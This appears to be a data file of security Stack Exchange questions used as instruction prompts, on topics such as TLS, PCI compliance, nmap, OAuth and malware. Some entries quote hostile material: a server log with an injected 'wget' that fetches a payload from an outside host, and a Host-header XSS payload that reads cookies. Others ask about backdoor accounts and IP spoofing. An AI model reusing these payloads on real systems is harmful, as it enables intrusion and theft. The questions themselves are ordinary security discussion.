instruction
stringlengths
24
29.9k
If I try the sV (service detection) flag in nmap run via proxychains (socks5 server) it appears to give me a segmentation fault message:- root@kali:~# proxychains nmap -n -sT -Pn X.X.X.X -p 22,80,222,10000 -sV ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-25 16:40 BST Se...
I am using the last versions of IE, Firefox and Google Chrome web browsers on Windows 8. How can force these browsers to accept automatically the SSL certificates of any website I will visit ? I know this is not a good security practice, but I do it for a specific security reason, indeed (virtualization and some stuff)...
I'm learning about web security mechanisms. I have developed the following system in PHP and JavaScript: assuming that I have a page named: messages.php which is a real-time chat system. first when the page loads, a page id is generated and then an Encryption Key is stored into a Session called $_session["key".page_id...
I want to scan my own website for vulnerabilities using Vega and w3af from kali linux. I assume these tools perform active attacks, not passive ones. Is this correct? If they do perform active attacks on the site to find vulnerabilities, are the payloads malicious? E.g. can I harm the database when checking for SQL inj...
3D secure is a system where, after you enter your credit card details on a merchants site, you are redirected to a site hosted on the bank servers where you enter a OTP sent via SMS to complete the transaction. However, this system is only used by sites hosted in India and a few other countries. Doesn't this render the...
Canvas Fingerprinting has been getting a lot of press these last few days. Here is a study I read on this topic: 1 and 2 What can I do to keep browsing anonymously and avoid this tracking method?
Does storing temporarily a non-encrypted file containing some PANs violate pci requirements? (for example because it is being processed by an application, or to open it on a file editor)
I am trying to build an EAP-TLS client. The handshake I have to deal with involves receipt of fragmented messages from the RADIUS server. As a part of the client reply, I have to construct a certificate verify message, which involves hashing all messages involved in the handshake using a private key, to ensure mutual a...
I believe that it uses some combination of the random values sent in the hello messages. From RFC 2246: (TLSv1.0) RSA encrypted premaster secret message Meaning of this message: If RSA is being used for key agreement and authentication, the client generates a 48-byte premaster secret, encrypts it usi...
Having a backdoor account (that is a username/password that can login in to an administrative account on all machines) can be very useful for IT staff. However, some believe it's a security breach. What are the pros and cons? Pros access even if user forgets password access whenever is convenient, for example if user...
I am reviewing NIST SP800-30 rev 1 and I am having a hard time understanding how they determine the distribution of values within the risk matrix. In the document, they define semi-qualitative values – I am assume that these values are used in the calculation – however, the calculations are not provided. I am trying to...
Greetings SE security community. Background: I have a number of items like certificates, databases, and encrypted file systems that require private keys. In order to avoid having duplicates of these keys on the different systems that use them, I'd like to keep them all in a secure portable location, like an encrypted f...
My girlfriend just told me that her computer was stolen, the computer was hibernated and the second the thief turn the computer on a lots a things will open automatically. I'm hoping I can get the computer location, or at least an IP address when the computer turns on It is a Windows 7, below the services that will pop...
I run an MMORPG game and today while moving from one server to another, apache failed and listed some of the data on the server including a back-up of all the source code + database which a few people downloaded By the time I realized that happened, I forced a password change on all users and I immediately changed my d...
Is there any security measures that I should take when downloading article text from the web as far as file integrity? For example, I've written a bot that retrieves article text from a user's blog and saves them to disk. What measures would you recommend and/or enforce?
I want to send data over the Internet securely. For that, I am using an public key of the receiver to encrypt the data. In this case, if an intruder in the network modifies the data, like placing the bits by rotating, can I decrypt the data successfully? And also I am sending data over the network all the time. If the...
I wonder if it is safe to use public WiFi in places where the WiFi router might not be managed by professionals and anybody is able to come and connect to the network with their own device. There are many things that can happen when the workplace hasn't protected their Wi-Fi. For example, DNS spoofing isn't really hard...
Is there a way to achieve PCI compliant data encryption at disk/folder level in Windows in a way that is transparent to applications(they must be able to write/read to encrypted folders/disks as if they weren't encrypted)? How should the keys be managed (regarding for example key rotation)?
I want to trace a user based on IP Address (or MAC Address) on a Network with about 10 L2 or L3 Switches. Is it possible to know that on exactly which switch and on which port a user with a specific IP Address (or MAC Address) is working?
I have a Tomcat application which is front ended by an Apache web server - end users connect to the Apache web server (never directly to Tomcat) and Apache has a valid, externally issued SSL etc The Apache web forces HTTPS so I have to connect to Tomcat over HTTPS otherwise it causes mixed mode messages etc and stops f...
If a computer is setup as a honeypot and is on the same LAN with other computers, could other computers be attacked? My thought is that if an attacker infects a honeypot with a worm, this worm would spread over the LAN to other computers. Am i right?
So I have minimal knowledge of security really but I'm a primary developer on an application which handles some sensitive data that we want to be secure. The application communicates with one other server (the other server is the front end, my server is basically the backend). Our security expert (who is not currently ...
I'm trying to do some Nmap OS detection and I'm running into some results I don't understand. The scan I'm running is the following: nmap -O -F -v -T2 -oA nmap-uphosts-OSdetect -iL < my_in_file I've got -F in there to limit the number of ports because the scan of 40 hosts was taking really long with the default 1000 ...
What I mean by public device? E.g. in Germany we have small stations to charge cars powered by electricity. This stations are small towers with a flap. Behind the flap are plugs to connect the tower with your car. Process of charging: To utilize the tower we use a smartphone app. The user can browse through a number o...
Please find here described an OAuth2 session fixation attack. Is the attack possible? And am I understanding correctly how it can be stopped? The attack Mallory starts logging in at client.example.com via a certain OpenAuth2 provider, but just after the provider has sent the authorization response (https://www.rfc-edit...
Is there any known virus that targets the main operating systems: Windows, Linux and Mac OS X?
If a computer (running different services such as ftp and ssh) is placed on a Demilitarized Zone, will all of its services automatically be accessed by anyone on the internet? If the answer is yes, then is it possible to only allow a specific service such as ftp, to be accessed over the internet and block access to al...
I have a friend (X) who hacked the whatsapp account of someone (Y) using iphone. He told me that he sent a packet to the iphone of Y that appears as a normal whatsapp message but now he can see all the chat of Y. My question is how did he do it exactly and what's the name of this technique? Don't iphone or other machin...
is there a solution to create FW rules by URL instead of IP for inbound traffic? For example a.example.com and b.example.com are the same IP on the DNS, but they are different sites, is there a solution to open port 22 for example just to a.example.com? If so, what is the name of the solution? Thanks.
I've researched several forms of encryption/hashing and have often come across the term "bits of security". For example, at least one source claimed SHA-256 = AES128 = ECC256 = 128 bits of security. My question is, if this is true, can I take a 256-bit SHA-256 digest and compress it down to 128 bits without loss of ...
I've noticed that I used to be assigned an external IPv4 from my ISP and a 24 bit mask (255.255.255.0), then it changed to 255.255.255.255, today I was studying IPv4 subnetting and I understand that now each ISP subscriber is on his own subnet (right?), then I read about the Snowden leak of the partnership between NSA ...
Could a PDF file contain any type of malware?
I am performing a penetration test against a website that uses Flash. I found this piece of code: url = ExternalInterface.call("window.document.location.href.toString") as String; How it can be exploited? I tried to exploit it as XSS via submitting a payload after the #: .swf?id=blabla#payloadhere but nothing. Since ...
I have a REST API that can potentially serve multiple web clients. I want to ensure that only my single page app on my-one-and-only-web-cleint.com can make requests to my API. How do I do this? Right now there isn't much to stop someone from copying the source of my website and act as a copy of my single page app on my...
If you have a fairly secure computer how dangerous is it to connect to a modem directly without a router in between. Let's say the computer is running Debian as a host and Whonix in VirtualBox, a VPN on host and has the appropriate firewall rules in place. Would it still be important both for security and the integrit...
Say we are given a strong cryptographic hash function hash(), a strong completely random password of 15 characters pass15, two single-character salt values salta, saltb. We compute the hashes hasha, hashb by applying the hash function to the pass15 password + the salts: hasha = hash(pass15+salta) hashb = hash(pass15+s...
In this video, an experienced Ubuntu user manages to infect his system with some sort of malware. This is the first example I've ever seen of truly successful malware in the wild aside from privilege escalation. I have learned my lesson and since disabled Flash, but I'm still curious, how was this able to infect the sy...
The OAuth2 spec describes the Resource Owner Password Credentials grant type and authorisation flow here. I understand that only 'trusted' client applications would be allowed to use this grant, for example the 'official' iPhone or Android client application to by backend API. My question is: how can I guarantee that r...
I am currently writing a thesis about digital forensics which includes a chapter about memory forensics. Besides the tools and the methods of acquiring various data with them, I am kind of desperate to find information about how these tools (eg Volatility) are actually working in theory. For example, how they identify...
I'm able to inject JavaScript payload in HOST header, a request will look like: Host: <script>alert(document.cookie)</script> User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/29.0 Cookie got alerted with no problem. My question is: is this exploitable? Or is it a Self-XSS because I don't know how to send the victim a sp...
We have an Authority Center (CA) generating some public and private keys for each client (more than one pair for each client). One method for sending keys to client is sharing a secret key between CA and client, and then sending key pairs and certificates by symmetric encryption method (with secret key). But overhead w...
Considering OpenVZ, KVM and Xen: Which VM technology is the most difficult for the host's administrators to access given an encrypted root partition? Can I have a reasonable expectation that rogue administrators cannot become root inside my VPS by running a simple command on the host machine? Which type of VM is most ...
How to trace an admin login to active directory server (2008 R2) from which host or which ip (In the situation where multiple admin are working) ?
There is a very interesting puzzle on the Programming Puzzles and Code Golf site to Rearrange pixels in an image so it can't be recognized and then get it back. I understand that this is not cryptography, but I wonder how effectively a message could be hidden in such an image and then securely transferred and retrieved...
Question(s) Is it possible to "redirect" linux-update-repos via DNS spoofing (e.g. DNS cache poisoning) to a malicious website, so that harmful software (updates) will be installed, when running the packet manager's update function (yum, apt-get, etc.)? Or is that completely unrealistic, since those repos are very well...
What is the difference between virtual machine and virtual desktop? KOMODO Internet Security, for example, offers virtual desktop, and there's a stealth program there. If software sends the same identifier, hostname, tracking cookie or similar does VM or VD prevent the leaks?
According to Browsec's website this application can be used to Bypass firewalls. So in countries like Iran it seems a useful tool to bypass censorship and filtering. For start using this application there are two version available, A "Chrome extension" and a "Portable Firefox" version. My question is that is it safe to...
We have a set of servers hosted at a tier-1 provider, and they are currently behind a VPN running on a gateway machine and not accessible to the open internet. Due to VPN instability issues we've been having, we're looking at other options. Can someone provide ideas on how we can maintain protection at the network le...
Are anti-viruses useful nowadays ? Given the number of viruses that are developed and spread monthly, and given the fact anti-viruses are based on virus signatures, I wonder how much it is useful and effective to use an anti-virus ?
I was reading about CompuTrace and this thing is pretty much a backdoor and irremovable. It's in the firmware, in the BIOS and survives formatting and even hard drive change and OS reinstalls. Some question came to mind, Does CompuTrace work with Linux? Does CompuTrace still work when using VPN or Tor? How do you fin...
I have an old PDF.zip file that is password secured. Naturally I can't remember it. Is there a way to change it or disable it?
Illustration : mainsite.com and contentsite.com both are being developed for same company by two teams. we will have login etc at mainsite.com contentsite.com will have some content that is not available for users who have not logged-in. But login will be via mainsite.com What is the best way to implement this? Some us...
In a blog post I recently read called "You Don't Want XTS," the author explains some of the pitfalls of using XTS to encrypt filesystems. Specifically, he recommends against ever sharing encrypted file-based filesystems over services like Dropbox when the file-based disk is encrypted in XTS. Since TrueCrypt offers a fa...
I was looking at the TLS Working Group Charter. I noticed that confidentiality and integrity of messages for those who desire it are not goals for the group. Naively, I believe confidentiality and integrity are probably the predominant use cases. There are even folks who [incorrectly] state you get "end-to-end" securit...
I'm doing a penetration test for a client who wants me to try and target a specific server. I have managed to get credentials(hard-coded in an in-house app) to a limited account on this server that works with sftp, but won't give a shell with SSH. The message states that shells are only available when connecting from t...
I'll be looking to perform a domain password audit in which the user will be using english characters but may be 40% Mandarin speakers so I anticipate a large number of names, phrases, or words that are written to be mandarin (but written using english character set). I'd like to perform a hybrid attack and thus I'm ho...
This is a short but general question. I am relatively new to programming in general. My site, which is predominately written in PHP, will be launched soon and is undergoing some security tightening. This started with converting the whole thing to PDO with prepared statements (from what was a MySQL set up) to making ses...
today I received this 16X.XXX.XX.77 - - [28/Jul/2014:--:--:--] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 3596 "-" "chroot-apach0day" so with HTTP_USER_AGENT: chroot-apach0day REQUEST_URI: x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day app...
I received this email from what is supposedly Facebook today. Here's a screenshot: I was not aware I had credits or credits existed on Facebook and apparently I have $2.30 worth. It looks legitimate at first glance, the email address looks like all the other Facebook emails I get but I have a few reasons to believe th...
The new banking app (for norwegian bank Gjensidige bank) for my android handset allows me to log in using only my social security number, and a 4 digit pin code. The social security number in norway is not a secret number (even though people usually dont post it online). The phone is registered in the internet-bank, to...
Since canary is used by gcc to prevent stack overflow (e.g. -fstack-protector), I am wondering whether glibc uses canary-based approach to defend heap buffer overflow? For example, this paper proposes canary-based detection against heap buffer overflow. And Windows systems already use heap cookies to mitigate heap buff...
I have always been told that writing your own login method (e.g. validate user given the username and password) is bad practice, and that one should reuse existing libraries for that. I have always believed that, but I am looking for practical threats in such a scenario (C#). The practical case I am looking into is cu...
I found some website blacklisted on Google. I mean when you try to visit them, you get something like shown on this picture: After a small search, I found that some of them have a malicious JavaScript file on few of their URLs. My question: could a malicious JavaScript file (pointed on a URL www.example.com/picture...
I have a website. Suppose someone will code a program that will click continuously on the links of my webpage: could this lead to a DoS attack ?
As https://security.stackexchange.com/a/11935/35886 states: the best protection against code injection is to prevent it but often you see posts on SO or here that goes like I found "long line of php/perl, etc code" and want to know what it does. Then I realized that many of those code injections tend to be very long ...
I have a classic security problem where Alice needs to prove its identity to Bob but with quite unusual requirements and constraints due to a M2M context. EDITs in bold The communication channel used between Alice and Bob has the following characteristics : only Alice can send messages to Bob (Bob cannot talk to Alice...
After having the hostmaster@domain.com email compromised, we found that someone issued a Domain Validated SSL certificate for our domain. Now we want to have all such certificates revoked. Is there a way to find all certificates issued to our domain by different SSL providers?
I started working at a large financial institution several weeks ago as a software engineer and despite every other aspect of this job being great, I am haunted by the constant restrictions that workstation security policy here puts us through. We are not allowed local administrator rights on our Windows 7 workstation...
I was wondering about the following: If someone tries to get my password with Brute Force, will a password starting with "a" guessed faster than one starting with "z" ? In this case assume the password is not salted, just hashed. Does a Brute Force attack start with "a", try and then go on or compute all hashes first a...
I'm trying to build my own PHP based REST Api for my Android app and I'm a litte bit confused by all the different user authentication stuff one can find on the internet. So I want to present my security considerations and would be glad about some feedback. First, I want to make clear that I don't want to build a publi...
I am looking for a program that can lock or encrypt folder, but in case if my laptop is stolen and C drive is reformatted and reinstalled, and i have locked folders on D drive, these folders to remain unaccessible. Also, these folders to remain unaccessible if someone try to use live linux distros from USB drive. Is th...
Can JavaScript malware be as dangerous and damaging as more traditional viruses that are programmed mostly in native APIs?
While reading through the newes OWASP ASVS standard (still beta) I have found a requirement V2.6 saying Verify that the session id is changed or cleared on logout. I do not see a clear point why it is necessary to have the session id changed or cleared after logout. It is necessary to have the session invalidated so...
Today I read an article on a French newspaper that our government listens to us when we use our cell phones. I wonder what type of programming methodoly or technology that allows this espionnage ?
Imagine a scenario where there is a DDOS attack against a target - clients would be unable to connect to the target, but I would like to know if the target could initiate a connection to the outside, and then have the response get through due to it being of a higher priority (since it was a requested connection vs an a...
Can a Linux environment be PCI compliant if the swap partition/file is not encrypted and PANs are loaded into RAM by an application?
I generate passwords for everything that requires security using the following method: ksoviero@ksoviero-Latitude-E7440:~$ head -c 16 /dev/urandom | base64 gorv/cp+lSiwiEfKck2dVg== 256^16 combinations is more than enough security (for me at least), and would take 2e21 years for even the most powerful computer to brut...
I'm new to concept of TOTP, but as I understand, 16-character base32-encoded shared secret is stored in the client application(for example Authy, FreeOTP)? This means that if I remove the application, the key is lost and I can no longer generate my one-time passwords?
As you can start a PC through its 'WAKE ON LAN' feature on private networks, can you trace someone's online status through their MAC address over the internet ?
Please Note: I am not going to name the websites which have these horrible standards for their clients and users. I have had to change my passwords for my routine update just recently in the last few months, several of my major services that I use forces weaker password standards. These weaker standards, which all of ...
I'm trying to understand how SSL/TLS certificates work, but I'm missing something. I have obtained my current understanding from this website: http://www.moserware.com/2009/06/first-few-milliseconds-of-https.html. I've also seen this post: How do the processes for digital certificates, signatures and ssl work? After re...
I have a client that needs to be able to secure a data site from hackers. This is the methodology we currently are looking at: server.com (web server) —> HTTP JSON API request —> dataStore.net (data server). He doesn’t want to force people to authenticate just to visit server.com. Authentication would be needed just...
import os, random, struct from Crypto.Cipher import AES def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024): """ Encrypts a file using AES (CBC mode) with the given key. key: The encryption key - a string that must be either 16, 24 or 32 bytes long. Lon...
We are creating an app and registration of user happens in following way. User sends via app: email-id/phone and username. Server sends a pin to enter in app via phone/email. User enters the pin in the app. After this we are thinking of two ways we could store some authentication information on app. A. Server send a...
I posted this originally on Drupal Stack Exchange, and it was recommended that I try here for an answer. Here is the original question: Visiting my Drupal 7 site just now with IE 11, I get this message: Windows Defender blocked content on this website lx7pyv.dofeqilr.com Hosted by: poligo.com Recommended icon Go to m...
To put this problem in context, I have a touch monitor screen whose firmware program is protected by a password. The firmware program is downloaded over RS232 via a Windows utility program provided by the manufacturer of the touch screen. The problem is, upon completing the download, the utility program asks for a 6-ch...
I'm designing a server which accepts anonymous messages using ECIES: as in, anonymous users send the server an ephemeral EC public key, and the server uses ECDH to derive a shared secret, and some KDF to obtain a shared symmetric key to decrypt the actual message. The problem is ECDH, which is among the fastest key ex...
I have an IP address of a computer which I am currently away from, and I need the MAC address. How do I get the MAC address if I ony have the IP?
On October 24th, 2013, the admins of the famous php.net website said that their website delivered malware to its visitors using a drive-by download attacK. I have several questions about this malware, however I prefer to ask only few of them since I already found answsers for other questions: I take this quote from th...
If an attacker were just given 256 bits, and they were either a SHA256 hash or a 256 bit elliptic curve key, would they be able to tell which one it is? Just out of curiosity, would they be able to tell the difference between the above and an AES256 encrypted block, or a 256 bit ECDSA signature?
Malicious JavaScript (generated by malicious hosted PHP code for example) can lead to attacks. What are the types of attack that malicious javascript could perform? Are the drive-by download attacks the only ones that malicious javaScript performs?
I have read a few articles about SIM cards, stating that the chip inside them uses some cryptographic magic to prevent people from cloning your number. This to me seems borderline impossible, given that you could manufacture a new chip with exactly the same circuitry hard-wired into it. So how does this cryptographic s...
My downloads stop completing and some page in the browser appearing blank or with text only without css or js and so on, some program after complete return me a message when trying to start installing: The setup files are corrupted. Please obtain a new copy of the program. Also I can't install google chrome or anti...
According to this answer, a valid login token schema would consist of the username (U) the time of issuance (T) and secret key K owned by the server only The suggestion then is to concatenate the values as following: token = U+T+hmac("sha256", U+T, K) Does this mean the server would have to split the token to validat...
A few years ago, there was a high-profile attack on a Wired editor, where the hackers added a credit card to the target's amazon account, then used that self-added credit card to gain access to the target's account. So they effectively poisoned Amazon's database for their attack, then social engineered their way throug...
I've recently started using LastPass and one of the things you can set as a policy for you password vault is Prevent offline access when using Google Authenticator. The local cache can be accessed without a second factor when using Google Authenticator [unless this policy is enabled] How can they enforce that? I...
I maintain a small site that runs old-fashioned classic ASP pages with an Access backend. Recently, the site got hacked. The attacker managed to add a large quantity of code to the index.asp page. Mostly it was static content, lots of links to dubious sites, that sort of thing, with a bit of scripting thrown in. I did...
How can I spoof my public IPv4 address to another without using proxys? I don't need any response, the TCP handshake needn't be completed! I just want to send a SYN packet with spoofed (specific) source address! My problem is, that every packet I craft can just have a spoofed private IP and my router would simply drop ...
I am not familiar with all the steps involved in a full-fledged information security review of an in-house developed application, so I am wondering whether or not the following scenario is commonplace. A web application is created, and runs on top of Microsoft's .NET framework. Under the terms of the security review, ...
I have a PKI certificate in Keychain Access.app on OS X 10.9, together with the private key. The manual page for /usr/bin/security indicates that there is a -x option for security import to specify that private keys are non-extractable after being imported, which I believe must have been used on my key. However, there'...